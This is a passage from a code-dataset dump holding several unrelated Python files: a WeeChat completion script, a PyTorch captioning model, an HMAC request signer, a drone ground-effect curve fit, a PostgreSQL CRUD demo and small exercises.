Set\n\"raw_lines_limit\" to set an absolute limit (default 150).\n\nBy default the script uses the regex \\b\\w+ to find the partial word in the\ninput bar and then finds candidates by searching for the partial word followed\nby \\w+ . This can be customized using the \"word_definition\" and \"word_start\"\nvariables.\n\nFor convenience if the input bar is empty, and hence completion is meaningless,\nthis script performs another command instead. Set these with the \"empty_cmd\"\nand \"empty_cmd_rev\" settings. By default they are set to ctrl-P and ctrl-N's\ndefaults respectively.\"\"\"\n\nimport weechat as w\nimport re\nfrom collections import OrderedDict\n\nSCRIPT_NAME = \"complete_words\"\nSCRIPT_AUTHOR = \"Øystein Walle \"\nSCRIPT_VERSION = \"0.1\"\nSCRIPT_LICENSE = \"GPL\"\nSCRIPT_DESC = \"Complete words from current buffer\"\n\nsettings = {\n \"word_definition\" : r'\\w+', # Regex used to find rest of word\n \"word_start\" : r'\\b\\w+', # Regex used to grab partial word\n \"lines\" : '50', # Number of lines to look in\n \"raw_lines\" : '150', # Number of lines to look in\n \"empty_cmd\" : '/buffer -1', # Command to run if input bar is empty\n \"empty_cmd_rev\" : '/buffer +1', # Command to run if input bar is empty\n}\n\nnew_completion = True\nlast_lines = []\nmatches = []\nindex = 0\npartial = ''\nhooks = ('', '')\n\ndef grab_current_word(buffer):\n left = get_input_line(buffer, -1)\n word_start = w.config_get_plugin(\"word_start\")\n part = re.search(word_start + '$', left, re.UNICODE)\n if part:\n global partial\n partial = part.group(0)\n return partial\n return None\n\ndef insert_word(buffer, word, prev_word):\n input_line = w.buffer_get_string(buffer, 'input')\n input_pos = w.buffer_get_integer(buffer, 'input_pos')\n\n strip_len = len(prev_word)\n left = input_line[0:input_pos - strip_len]\n new_pos = input_pos + len(word) - strip_len\n right = input_line[input_pos:]\n result = left + word + right\n\n # If we don't deactivate the hook temporarily it is triggered\n global hooks\n map(w.unhook, hooks)\n w.buffer_set(buffer, 'input', result)\n w.buffer_set(buffer, 'input_pos', str(new_pos))\n hooks = (w.hook_signal(\"input_text_*\", \"finish_hook\", \"\"),\n w.hook_signal(\"*_switch\", \"finish_hook\", \"\"))\n\ndef find_matches(partial):\n word_definition = w.config_get_plugin(\"word_definition\")\n pat = r'(?<=\\b' + partial + ')' + word_definition\n global matches\n for line in last_lines:\n m = re.findall(pat, line, re.UNICODE)\n m.reverse()\n matches = matches + m\n matches = list(OrderedDict.fromkeys(matches))\n\ndef get_input_line(buffer, right):\n input_line = w.buffer_get_string(buffer, 'input')\n input_pos = w.buffer_get_integer(buffer, 'input_pos')\n if right == 1:\n return input_line[input_pos:]\n elif right == -1: #Left\n return input_line[:input_pos]\n else:\n return input_line\n\ndef fill_last_lines(buffer):\n last_lines.append(get_input_line(buffer, -1))\n hdata = w.hdata_get(\"buffer\")\n lines = w.hdata_pointer(hdata, buffer, \"own_lines\")\n\n found = 0\n processed = 0\n lines_limit = int(w.config_get_plugin(\"lines\"))\n raw_lines_limit = int(w.config_get_plugin(\"raw_lines\"))\n line = w.hdata_pointer(w.hdata_get('lines'), lines, \"last_line\")\n\n while found < lines_limit and processed < raw_lines_limit and line != \"\":\n line_data = w.hdata_pointer(w.hdata_get('line'), line, \"data\")\n\n count = w.hdata_integer(w.hdata_get(\"line_data\"), line_data, \"tags_count\")\n if count == 0:\n processed += 1\n continue\n\n tag = w.hdata_string(w.hdata_get('line_data'), line_data, \"0|tags_array\")\n if tag == 'irc_privmsg':\n message = w.hdata_string(w.hdata_get('line_data'), line_data, \"message\")\n last_lines.append(message)\n found += 1\n line = w.hdata_pointer(w.hdata_get('line'), line, \"prev_line\")\n processed += 1\n\n last_lines.append(get_input_line(buffer, 1))\n\ndef input_bar_is_empty(buffer):\n return (get_input_line(buffer, 0) == \"\")\n\ndef run_other_command(backward):\n if backward:\n w.command(\"\", w.config_get_plugin(\"empty_cmd\"))\n else:\n w.command(\"\", w.config_get_plugin(\"empty_cmd_rev\"))\n\n# Called when invoking /complete_word\ndef main_hook(data, buffer, args):\n if args != \"reverse\":\n backward = True\n else:\n backward = False\n\n if input_bar_is_empty(buffer):\n run_other_command(backward)\n return w.WEECHAT_RC_OK\n\n global new_completion\n if new_completion == False:\n continue_completion(buffer, backward)\n else:\n # Set flag\n new_completion = False\n complete_word(buffer, backward)\n w.bar_item_update(\"complete_status\")\n return w.WEECHAT_RC_OK\n\n# Called when the cursor is moved after attempting completion\n# Taken as a signal that the completion is done\ndef finish_hook(signal, type_data, signal_data):\n finish_completion()\n w.bar_item_update(\"complete_status\")\n return w.WEECHAT_RC_OK\n\ndef complete_word(buffer, backward):\n fill_last_lines(buffer)\n partial = grab_current_word(buffer)\n if not partial:\n finish_completion()\n return\n find_matches(partial)\n if len(matches):\n global index\n if backward:\n index = 0\n else:\n index = len(matches) - 1\n insert_word(buffer, matches[index], '')\n else:\n finish_completion()\n\ndef continue_completion(buffer, backward):\n global index\n prev_word = matches[index]\n if backward:\n index = (index + 1) % len(matches)\n else:\n index = (index + len(matches) - 1) % len(matches)\n word = matches[index]\n insert_word(buffer, word, prev_word)\n\n# Cleanup function\ndef finish_completion():\n global new_completion\n new_completion = True\n global last_lines\n last_lines = []\n global matches\n matches = []\n global index\n index = 0\n global hooks\n map(w.unhook, hooks)\n hooks = ('', '')\n global partial\n partial = ''\n\ndef update_bar_item(data, item, window):\n if index == 0 and len(matches) == 0:\n return \"\"\n return 'Completing \\\"' + partial + '\": ' + str(index + 1) + '/' + str(len(matches))\n\nif __name__ == \"__main__\":\n if w.register(SCRIPT_NAME, SCRIPT_AUTHOR, SCRIPT_VERSION, SCRIPT_LICENSE,\n SCRIPT_DESC, \"\", \"\"):\n # Set default settings\n my_bar = w.bar_item_new(\"complete_status\", \"update_bar_item\", \"\")\n for option, default_value in list(settings.items()):\n if not w.config_is_set_plugin(option):\n w.config_set_plugin(option, default_value)\n w.hook_command(\"complete_word\", SCRIPT_DESC, help_args, help_args_desc, \"\", \"main_hook\", \"\")\n # Now we wait\n","repo_name":"Osse/complete_words","sub_path":"complete_words.py","file_name":"complete_words.py","file_ext":"py","file_size_in_byte":8256,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"32835755615","text":"import torch\nimport torch.nn as nn\nimport torchvision.models as models\nfrom torch.nn.utils.rnn import pack_padded_sequence\n\nclass EncoderCNN(nn.Module):\n def __init__(self, embed_size):\n super(EncoderCNN, self).__init__()\n resnet = models.resnet50(pretrained=True)\n for param in resnet.parameters():\n param.requires_grad_(False)\n \n modules = list(resnet.children())[:-1]\n self.resnet = nn.Sequential(*modules)\n self.embed = nn.Linear(resnet.fc.in_features, embed_size)\n ##Batch Normalisation & initialize weight in dense layer\n self.batch= nn.BatchNorm1d(embed_size,momentum = 0.01)\n self.embed.weight.data.normal_(0., 0.02)\n self.embed.bias.data.fill_(0)\n\n def forward(self, images):\n \"\"\"Extract the image feature vectors.\"\"\"\n features = self.resnet(images)\n features = features.view(features.size(0), -1)\n features = self.batch(self.embed(features))\n \n return features\n \n \nclass DecoderRNN(nn.Module):\n def __init__(self, embed_size, hidden_size, vocab_size, num_layers=1):\n \"\"\"Set the hyper-parameters and build the layers.\"\"\"\n super(DecoderRNN, self).__init__()\n \n self.embedding_layer = nn.Embedding(vocab_size, embed_size)\n \n self.lstm = nn.LSTM(input_size = embed_size,hidden_size = hidden_size,\n num_layers = num_layers, batch_first=True)\n \n self.linear = nn.Linear(hidden_size, vocab_size)\n self.dropout = nn.Dropout(0.35)\n self.init_weights()\n \n def init_weights(m):\n \"\"\"Initialize weights.\"\"\"\n if type(m) == nn.Linear:\n I.xavier_uniform_(m.weight)\n m.bias.data.fill_(0.01)\n \n if isinstance(m, nn.Conv2d):\n I.xavier_uniform_(m.weight.data)\n m.bias.data.fill_(0.01) \n \n\n def forward(self, features, captions):\n \"\"\" Decode feature vectors and generate captions \"\"\"\n ###Remove end tag\n captions = captions[:, :-1]\n embed = self.dropout(self.embedding_layer(captions))\n embed = torch.cat((features.unsqueeze(1), embed), dim = 1)\n #packed = pack_padded_sequence(embed, lengths, batch_first=True) \n lstm_outputs, _ = self.lstm(embed)\n out = self.linear(lstm_outputs)\n \n return out\n\n def sample(self, inputs, states=None, max_len=20): \n \" accepts pre-processed image tensor (inputs) and returns predicted sentence (list of tensor ids of length max_len) \" \n predicted_sentence = []\n \n for i in range(max_len): # max sampling length\n \n # Get output and states from LSTM layer\n lstm_out, states = self.lstm(inputs, states) #(batch_size, 1, hidden_size)\n lstm_out = lstm_out.squeeze(1)\n \n # Get output of the linear layer\n outputs = self.linear(lstm_out)\n \n # Get the best predicted \n predicted = outputs.max(1)[1]\n \n # Append predicted item to predicted sentence\n predicted_sentence.append(predicted.item())\n # Update input for next sequence\n inputs = self.embedding_layer(predicted).unsqueeze(1)\n \n #predicted_sentence = torch.cat(predicted_sentence, 0)\n return predicted_sentence","repo_name":"toyinogunlade/ImageCaptioning","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"3123002990","text":"from .base_signer import BaseSigner, BaseResponseSigner\n\nimport base64\nimport collections\nimport hashlib\nimport hmac\nimport re\nimport time\n# from urllib import parse as urlparse\n\ntry:\n import urllib.parse as urlparse\n from urllib.parse import quote as urlquote\nexcept:\n import urlparse as urlparse\n from urllib import quote as urlquote\n\nclass V2Signer(BaseSigner):\n \"\"\"Implements a signer for the 2.0 version of the Acquia HTTP HMAC spec\n\n Reference: https://github.com/acquia/http-hmac-spec/tree/2.0\n \"\"\"\n\n def __init__(self, digest=hashlib.sha256):\n \"\"\"Initializes a V2Signer object.\n\n Keyword arguments:\n digest -- A callable which, when called, returns a hasher object.\n For example (and default value): hashlib.sha256\n \"\"\"\n super(V2Signer, self).__init__(digest)\n self.preset_time = None\n\n def signable(self, request, authheaders, bodyhash=None):\n \"\"\"Creates the signable string for a request and returns it.\n\n Keyword arguments:\n request -- A request object which can be consumed by this API.\n authheaders -- A string-indexable object which contains the headers appropriate for this signature version.\n bodyhash -- The hash for the body of the request. None if the request contains no body.\n This is expected for internal reasons, otherwise the body would be hashed multiple times, degrading performance.\n \"\"\"\n method = request.method.upper()\n host = request.get_header(\"host\")\n path = request.url.canonical_path()\n query = request.url.encoded_query()\n\n timestamp = request.get_header(\"x-authorization-timestamp\")\n auth_headers = self.unroll_auth_headers(authheaders, exclude_signature=True, sep='&', quote=False)\n base = '{0}\\n{1}\\n{2}\\n{3}\\n{4}'.format(method, host, path, query, auth_headers)\n\n cheaders = []\n cheaders_sign = '\\n'\n if \"headers\" in authheaders and authheaders[\"headers\"] != \"\":\n cheaders = authheaders[\"headers\"].split(\";\")\n cheaders.sort()\n for cheader in cheaders:\n cheaders_sign += '{0}: {1}\\n'.format(cheader.lower(), request.get_header(cheader))\n base += cheaders_sign\n base += '{0}'.format(timestamp)\n\n if bodyhash is not None:\n base += '\\n{0}\\n{1}'.format(request.get_header('content-type'), bodyhash)\n\n return base\n\n def parse_auth_headers(self, authorization):\n \"\"\"Parses the authorization headers from the authorization header taken from a request.\n Returns a dict that is accepted by all other API functions which expect authorization headers in a dict format.\n parse_auth_headers(unroll_auth_headers(A)) should return a dict that is equal to A.\n\n Keyword arguments:\n authorization -- The authorization header of any request. The header must be in a format understood by v2.\n \"\"\"\n matches = re.findall(r'(\\w+)=\"(.*?)\"', authorization)\n return dict(matches)\n\n def sign(self, request, authheaders, secret):\n \"\"\"Returns the v2 signature appropriate for the request. The request is not changed by this function.\n\n Keyword arguments:\n request -- A request object which can be consumed by this API.\n authheaders -- A string-indexable object which contains the headers appropriate for this signature version.\n secret -- The base64-encoded secret key for the HMAC authorization.\n \"\"\"\n if \"id\" not in authheaders or authheaders[\"id\"] == '':\n raise KeyError(\"id required in authorization headers.\")\n if \"nonce\" not in authheaders or authheaders[\"nonce\"] == '':\n raise KeyError(\"nonce required in authorization headers.\")\n if \"realm\" not in authheaders or authheaders[\"realm\"] == '':\n raise KeyError(\"realm required in authorization headers.\")\n if request.get_header('x-authorization-timestamp') == '':\n raise KeyError(\"X-Authorization-Timestamp is required.\")\n bodyhash = None\n if request.body is not None and request.body != b'':\n sha256 = hashlib.sha256()\n sha256.update(request.body)\n bodyhash = base64.b64encode(sha256.digest()).decode('utf-8')\n\n try:\n mac = hmac.HMAC(base64.b64decode(secret.encode('utf-8'), validate=True), digestmod=self.digest)\n except TypeError:\n s = secret.encode('utf-8')\n if not re.match(b'^[A-Za-z0-9+/]*={0,2}$', s):\n raise binascii.Error('Non-base64 digit found')\n mac = hmac.HMAC(base64.b64decode(s), digestmod=self.digest)\n mac.update(self.signable(request, authheaders, bodyhash).encode('utf-8'))\n digest = mac.digest()\n return base64.b64encode(digest).decode('utf-8')\n\n def get_response_signer(self):\n \"\"\"Returns the response signer for this version of the signature.\n \"\"\"\n if not hasattr(self, \"response_signer\"):\n self.response_signer = V2ResponseSigner(self.digest, orig=self)\n return self.response_signer\n\n def matches(self, header):\n \"\"\"Returns True if the provided authorization header matches the format expected by this signer.\n\n Keyword arguments:\n header -- A string representing the authorization header of a request.\n \"\"\"\n if re.match(r'(?i)^\\s*acquia-http-hmac.*?version=\\\"2\\.0\\\".*?$', header) is not None:\n return True\n return False\n\n def check(self, request, secret):\n \"\"\"Verifies whether or not the request bears an authorization appropriate and valid for this version of the signature.\n This verifies every element of the signature, including the timestamp's value.\n Does not alter the request.\n\n Keyword arguments:\n request -- A request object which can be consumed by this API.\n secret -- The base64-encoded secret key for the HMAC authorization.\n \"\"\"\n if request.get_header(\"Authorization\") == \"\":\n return False\n ah = self.parse_auth_headers(request.get_header(\"Authorization\"))\n if \"signature\" not in ah:\n return False\n if request.get_header('x-authorization-timestamp') == '':\n raise KeyError(\"X-Authorization-Timestamp is required.\")\n timestamp = int(float(request.get_header('x-authorization-timestamp')))\n if timestamp == 0:\n raise ValueError(\"X-Authorization-Timestamp must be a valid, non-zero timestamp.\")\n if self.preset_time is None:\n curr_time = time.time()\n else:\n curr_time = self.preset_time\n if timestamp > curr_time + 900:\n raise ValueError(\"X-Authorization-Timestamp is too far in the future.\")\n if timestamp < curr_time - 900:\n raise ValueError(\"X-Authorization-Timestamp is too far in the past.\")\n if request.body is not None and request.body != b'':\n content_hash = request.get_header(\"x-authorization-content-sha256\")\n if content_hash == '':\n raise KeyError(\"X-Authorization-Content-SHA256 is required for requests with a request body.\")\n sha256 = hashlib.sha256()\n sha256.update(request.body)\n if content_hash != base64.b64encode(sha256.digest()).decode('utf-8'):\n raise ValueError(\"X-Authorization-Content-SHA256 must match the SHA-256 hash of the request body.\")\n return ah[\"signature\"] == self.sign(request, ah, secret)\n\n def unroll_auth_headers(self, authheaders, exclude_signature=False, sep=\",\", quote=True):\n \"\"\"Converts an authorization header dict-like object into a string representing the authorization.\n\n Keyword arguments:\n authheaders -- A string-indexable object which contains the headers appropriate for this signature version.\n \"\"\"\n res = \"\"\n ordered = collections.OrderedDict(sorted(authheaders.items()))\n form = '{0}=\\\"{1}\\\"' if quote else '{0}={1}'\n if exclude_signature:\n return sep.join([form.format(k, urlquote(str(v), safe='')) for k, v in ordered.items() if k != 'signature'])\n else:\n return sep.join([form.format(k, urlquote(str(v), safe='') if k != 'signature' else str(v)) for k, v in ordered.items()])\n # legacy bad code\n # for k, v in ordered.items():\n # if res != \"\":\n # res += \",\"\n # value = str(v)\n # if k != \"signature\":\n # value = urlquote(str(v), safe='')\n # res += \"{0}=\\\"{1}\\\"\".format(k, value)\n # return res\n\n def sign_direct(self, request, authheaders, secret):\n \"\"\"Signs a request directly with a v2 signature. The request's Authorization header will change.\n This function may also add the required X-Authorization-Timestamp and X-Authorization-Content-SHA256 headers.\n\n Keyword arguments:\n request -- A request object which can be consumed by this API.\n authheaders -- A string-indexable object which contains the headers appropriate for this signature version.\n secret -- The base64-encoded secret key for the HMAC authorization.\n \"\"\"\n if request.get_header('x-authorization-timestamp') == '':\n request.with_header(\"X-Authorization-Timestamp\", str(time.time()))\n if request.body is not None and request.body != b'':\n if request.get_header(\"x-authorization-content-sha256\") == '':\n sha256 = hashlib.sha256()\n sha256.update(request.body)\n request.with_header(\"X-Authorization-Content-SHA256\", base64.b64encode(sha256.digest()).decode('utf-8'))\n sig = self.sign(request, authheaders, secret)\n authheaders[\"signature\"] = sig\n return request.with_header(\"Authorization\", \"acquia-http-hmac {0}\".format(self.unroll_auth_headers(authheaders)))\n\n\nclass V2ResponseSigner(BaseResponseSigner):\n def __init__(self, digest=hashlib.sha256, orig=None):\n \"\"\"Initializes a V2ResponseSigner object\n\n Keyword arguments:\n digest -- A callable which, when called, returns a hasher object.\n For example (and default value): hashlib.sha256\n orig -- A V2Signer object whose get_response_signer() returns this object.\n If None is provided, one such object is created internally.\n \"\"\"\n super(V2ResponseSigner, self).__init__(digest)\n if orig is None:\n self.orig = V2Signer(digest)\n self.orig.response_signer = self\n else:\n self.orig = orig\n\n def check(self, request, response, secret):\n \"\"\"Checks the response for the appropriate signature. Returns True if the signature matches the expected value.\n\n Keyword arguments:\n request -- A request object which can be consumed by this API.\n response -- A requests response object or compatible signed response object.\n secret -- The base64-encoded secret key for the HMAC authorization.\n \"\"\"\n auth = request.get_header('Authorization')\n if auth == '':\n raise KeyError('Authorization header is required for the request.')\n ah = self.orig.parse_auth_headers(auth)\n act = response.headers['X-Server-Authorization-HMAC-SHA256']\n if act == '':\n raise KeyError('Response is missing the signature header X-Server-Authorization-HMAC-SHA256.')\n sig = self.sign(request, ah, response.text, secret)\n return sig == act\n\n def signable(self, request, authheaders, response_body):\n \"\"\"Creates the signable string for a response and returns it.\n\n Keyword arguments:\n request -- A request object which can be consumed by this API.\n authheaders -- A string-indexable object which contains the headers appropriate for this signature version.\n response_body -- A string or bytes-like object which represents the body of the response.\n \"\"\"\n nonce = authheaders[\"nonce\"]\n timestamp = request.get_header(\"x-authorization-timestamp\")\n try:\n body_str = response_body.decode('utf-8')\n except:\n body_str = response_body\n return '{0}\\n{1}\\n{2}'.format(nonce, timestamp, body_str)\n\n def sign(self, request, authheaders, response_body, secret):\n \"\"\"Returns the response signature for the response to the request.\n\n Keyword arguments:\n request -- A request object which can be consumed by this API.\n authheaders -- A string-indexable object which contains the headers appropriate for this signature version.\n response_body -- A string or bytes-like object which represents the body of the response.\n secret -- The base64-encoded secret key for the HMAC authorization.\n \"\"\"\n if \"nonce\" not in authheaders or authheaders[\"nonce\"] == '':\n raise KeyError(\"nonce required in authorization headers.\")\n if request.get_header('x-authorization-timestamp') == '':\n raise KeyError(\"X-Authorization-Timestamp is required.\")\n\n try:\n mac = hmac.HMAC(base64.b64decode(secret.encode('utf-8'), validate=True), digestmod=self.digest)\n except TypeError:\n s = secret.encode('utf-8')\n if not re.match(b'^[A-Za-z0-9+/]*={0,2}$', s):\n raise binascii.Error('Non-base64 digit found')\n mac = hmac.HMAC(base64.b64decode(s), digestmod=self.digest)\n mac.update(self.signable(request, authheaders, response_body).encode('utf-8'))\n digest = mac.digest()\n return base64.b64encode(digest).decode('utf-8')\n","repo_name":"baliame/http-hmac-python","sub_path":"httphmac/v2.py","file_name":"v2.py","file_ext":"py","file_size_in_byte":13659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"71515388054","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom scipy.signal import savgol_filter\nfrom scipy.spatial.transform import Rotation as R\nfrom scipy.optimize import curve_fit\n\n# paths\npath = \"../log/traj_log.csv\" # data of hovering on multiple altitudes for T_IGE\n# data of simple hovering on one altitude for T_OGE\nhover_path = \"../log/hover_log.csv\"\n\n# initialize plot\nfig = plt.figure(figsize=(20, 8)) # xyz plot\nax = fig.add_subplot(111)\nplt.xticks(fontsize=20)\nplt.yticks(fontsize=20)\n\n# rpm-thrust relation (either from datasheet or experimental)\n\n\ndef rpmToThrust(rpm):\n return 1.1382941*(10**-7)*np.square(rpm)\n\n\n# read in data\nheaderList = [\"t\", \"x\", \"y\", \"z\", \"vx\", \"vy\", \"vz\", \"ro\", \"pi\", \"ya\", \"vro\", \"vpi\", \"vya\", \"rpm1\",\n \"rpm2\", \"rpm3\", \"rpm4\", \"volt1\", \"volt2\", \"volt3\", \"volt4\", \"amp1\", \"amp2\", \"amp3\", \"amp4\"]\ntime = pd.read_csv(path, usecols=[\n \"t\"], names=headerList).to_numpy()\npos = pd.read_csv(path, usecols=[\n \"x\", \"y\", \"z\"], names=headerList).to_numpy()\nrpm = pd.read_csv(\n path, usecols=[\"rpm1\", \"rpm2\", \"rpm3\", \"rpm4\"], names=headerList).to_numpy()\n\n# determine signal length\nsignal_length = np.shape(time)[0]\n\n# find out of ground effect (OGE) thrust\nrpm_cal = pd.read_csv(\n hover_path, usecols=[\"rpm1\", \"rpm2\", \"rpm3\", \"rpm4\"], names=headerList).to_numpy()\nthrust_cal = np.sum(rpmToThrust(rpm_cal), axis=1) # - mass*g\nT_oge = np.average(thrust_cal)\n\n# remove nan's\npos = np.nan_to_num(pos, copy=True, nan=0.0) # [m]\nrpm = np.nan_to_num(rpm, copy=True, nan=0.0) # [1/min]\n\n# filter data (if result is unsatisfying, the savgol-windows might need adjustment)\nfor i in range(2):\n pos[:, i] = savgol_filter(pos[:, i], 50, 3)\nfor i in range(3):\n rpm[:, i] = savgol_filter(rpm[:, i], 500, 3)\n\n# rpm to thrust (according to relation)\nT_motor_real = rpmToThrust(rpm)\n\n# sum up the thrust over all motors\nT_ige = np.sum(T_motor_real, axis=1)\n\n\ncut_front = 2000\ncut_back = 1000\n\n# plot data\nax.plot(pos[cut_front:signal_length-cut_back, 2], T_oge/T_ige[cut_front:signal_length-cut_back],\n color=\"blue\", label=\"flight data\")\n\n# perform data regression\nx_data = pos[cut_front:signal_length-cut_back, 2]\ny_data = T_oge/T_ige[cut_front:signal_length-cut_back]\n\n# ansatz function\n\n\ndef f_ansatz(x, a, b, c):\n return a * np.exp(- b * x) + c\n\n\npopt, pcov = curve_fit(f_ansatz, x_data, y_data)\nprint(popt)\n\n# plot fit\nplt.plot(x_data, f_ansatz(x_data, *popt), 'r-',\n label='fit: %5.3f*exp(-%5.3f*z)+ %5.3f' % tuple(popt))\n\nax.set_xlabel(\"z [m]\", fontsize=20)\nax.set_ylabel(\"$T_{IGE}$ / $T_{OGE}$ [s]\", fontsize=20)\nplt.legend(prop={'size': 20})\nplt.savefig(\"static_compensator.svg\")\nplt.savefig(\"static_compensator.pdf\")\nplt.show()\n","repo_name":"aurelappius/quadcopter-groundeffect-control","sub_path":"flight_analysis/ground_effect_model.py","file_name":"ground_effect_model.py","file_ext":"py","file_size_in_byte":2735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"10112123258","text":"import psycopg2\r\nconn = None\r\ntry:\r\n while conn == None:\r\n try:\r\n conn = psycopg2.connect(\r\n user='mkrawiec',\r\n password='password',\r\n host='10.0.10.3',\r\n port='5432',\r\n database='mkrawiec_db',\r\n ) \r\n except:\r\n continue\r\nexcept:\r\n pass\r\nprint(\"Połączono\\n\")\r\ncur = conn.cursor()\r\nimie_1 = \"Jan\"\r\nnazwisko_1 = \"Kowalski\"\r\nimie_2 = \"Adam\"\r\nnazwisko_2 = \"Malinowski\"\r\nimie_3 = \"Zbigniew\"\r\nnazwisko_3 = \"Wodecki\"\r\ntable = False\r\ntry:\r\n while table == False:\r\n try:\r\n create_table = 'CREATE TABLE IF NOT EXISTS \"Uzytkownicy\" (id SERIAL PRIMARY KEY, \"Imie\" varchar(30) NOT NULL, \"Nazwisko\" varchar(30) NOT NULL);'\r\n select = 'SELECT * FROM \"Uzytkownicy\";'\r\n cur.execute(create_table)\r\n conn.commit()\r\n table = True\r\n except:\r\n continue\r\nexcept:\r\n print(\"error\")\r\nprint(\"Utworzono tabele\\n\")\r\ntry: \r\n cur.execute('INSERT INTO \"Uzytkownicy\" (\"Imie\", \"Nazwisko\") VALUES (%s, %s);', (imie_1, nazwisko_1))\r\n conn.commit()\r\n cur.execute('INSERT INTO \"Uzytkownicy\" (\"Imie\", \"Nazwisko\") VALUES (%s, %s);', (imie_2, nazwisko_2))\r\n conn.commit()\r\n cur.execute('INSERT INTO \"Uzytkownicy\" (\"Imie\", \"Nazwisko\") VALUES (%s, %s);', (imie_3, nazwisko_3))\r\n conn.commit()\r\n print(\"Dodano 3 rekordy do bazy\\n\")\r\nexcept:\r\n print(\"error\")\r\nnumber = '0'\r\nwhile number!=5:\r\n print(\"1 - dodaj uzytkownika 2 - usun uzytkownika 3-aktualizuj dane uzytkownika 4-wyswietl uzytkownikow 5-koniec\")\r\n number = int(input())\r\n \r\n if number == 1:\r\n try:\r\n imie = input(\"Imie: \")\r\n nazwisko = input(\"Nazwisko: \")\r\n cur.execute('INSERT INTO \"Uzytkownicy\" (\"Imie\", \"Nazwisko\") VALUES (%s, %s);',(imie, nazwisko))\r\n conn.commit()\r\n print(\"Dodano uzytkownika\\n\")\r\n except: \r\n print(\"error\")\r\n elif number == 2:\r\n try:\r\n id = input(\"Id uzytkownika: \")\r\n cur.execute('DELETE FROM \"Uzytkownicy\" WHERE id=%s;', id)\r\n conn.commit()\r\n print(\"Usunieto uzytkownika o id = %s\",id)\r\n except:\r\n print(\"error\")\r\n \r\n elif number ==3:\r\n try:\r\n id = input(\"Id uzytkownika: \")\r\n imie = input(\"Nowe imie: \")\r\n nazwisko = input(\"Nowe nazwisko: \")\r\n cur.execute('UPDATE \"Uzytkownicy\" SET \"Imie\"=%s, \"Nazwisko\"=%s WHERE id=%s;', (imie, nazwisko, id))\r\n conn.commit()\r\n print(\"Zaktualizowano dane uzytkownikao id = %s\",id)\r\n except: \r\n print(\"error\")\r\n elif number == 4:\r\n try:\r\n cur.execute(select)\r\n users = cur.fetchall()\r\n for u in users:\r\n print(\"Id = \", u[0], )\r\n print(\"Imie = \", u[1])\r\n print(\"Nazwisko = \", u[2], \"\\n\")\r\n except: \r\n print(\"error\")\r\n\r\ncur.close()\r\nconn.close()\r\n","repo_name":"Kominiarz97/compose_python_postgresql","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3066,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"8008309161","text":"#!/usr/local/bin/python\n\nimport bisect\nimport math\nimport sys\n\nsys.path.append(\"/Users/khmacdonald/code/SVN/trunk/euler/utilities/\")\nfrom primes import sieve\n\n\nav = sys.argv\nac = len(av)\n\ndef proj():\n idx = 2\n x = 1\n mx = 100000\n s = sieve(mx)\n tot, pcnt = 1, 0\n stop = False\n while not stop:\n for k in range(4):\n x = x+idx\n tot = tot + 1\n if s.is_prime(x):\n pcnt = pcnt+1\n p = float(pcnt)/float(tot)\n if p<0.1:\n print(\"pcnt = %d, tot = %d, idx = %d\" % (pcnt,tot,idx))\n stop = True\n break\n idx = idx + 2\n\nif __name__=='__main__':\n proj()\n\n","repo_name":"khmacdonald/Misc","sub_path":"euler/p0058.py","file_name":"p0058.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"33733494772","text":"import csv\r\nfrom collections import Counter\r\nwith open('SOCR-HeightWeight.csv', newline = '') as mode:\r\n reader = csv.reader(mode)\r\n fileData = list(reader)\r\n\r\nfileData.pop(0)\r\nnewData=[]\r\n\r\nfor i in range(len(fileData)):\r\n num = fileData[i][1]\r\n newData.append(float(num))\r\n\r\nCounterData = Counter(newData)\r\nrange = {\"50-60\":0,\"60-70\":0,\"70-80\":0}\r\n\r\nfor height, occurence in CounterData.items():\r\n if 50 modeOccurence:\r\n modeRange, modeOccurence = [int(range.split(\"-\")[0]),int(range.split(\"-\")[1])], occurence\r\n\r\nm = float((modeRange[0]+modeRange[1])/2)\r\nprint(m)","repo_name":"Suchet-13/P-104","sub_path":"mode.py","file_name":"mode.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"11154670351","text":"# Read a file which includes at least two paragraphs.\n# Calculate the word frequency for each word in the file. The steps to do so are:\n# 1. Split the words in the file\n# 2. Use a loop to iterate over the words.\n# 3. Add the first word to the file, put the value 1\n# 4. Add the second word to the file, put the value 1.\n# 5. If you faced with a word that you have already added to the file, just update the value\n# 6. Finally, you will have a file which includes all the words with their counts,\n# ex: {“Is”: 5, “politics”:3, “country”:1, ...}\n\nfileName = input(\"What file are the paragraphs in?: \")\ninfile = open(fileName, 'r')\nline = infile.readline()\nlistOfWords = []\nfreqOfWords = []\nwhile line != \"\":\n line = line.strip()\n listOfWords.extend(line.split(\" \"))\n line = infile.readline()\nfor w in listOfWords:\n freqOfWords.append(listOfWords.count(w))\nnewList = list(zip(listOfWords, freqOfWords))\nfinalList = set(newList)\nprint(finalList)\nprint(newList)\n","repo_name":"eldq5d/UMKC-490-Python","sub_path":"Lab1/Task1.py","file_name":"Task1.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"31845838379","text":"import unittest\nimport gobject\nimport cairo\nfrom pyfirtree import *\n\nclass SimpleReduce(unittest.TestCase):\n def setUp(self):\n self._k = Kernel()\n self.assertNotEqual(self._k, None)\n src = \"\"\"\n kernel __reduce void simpleKernel(static sampler src) {\n vec4 incol = sample(src, samplerCoord(src));\n if(incol.r > 0.5) {\n emit(vec4(destCoord(), 1, 0));\n }\n if(incol.g > 0.5) {\n emit(vec4(destCoord(), 2, 0));\n }\n }\n \"\"\"\n self._k.compile_from_source(src)\n\n log = 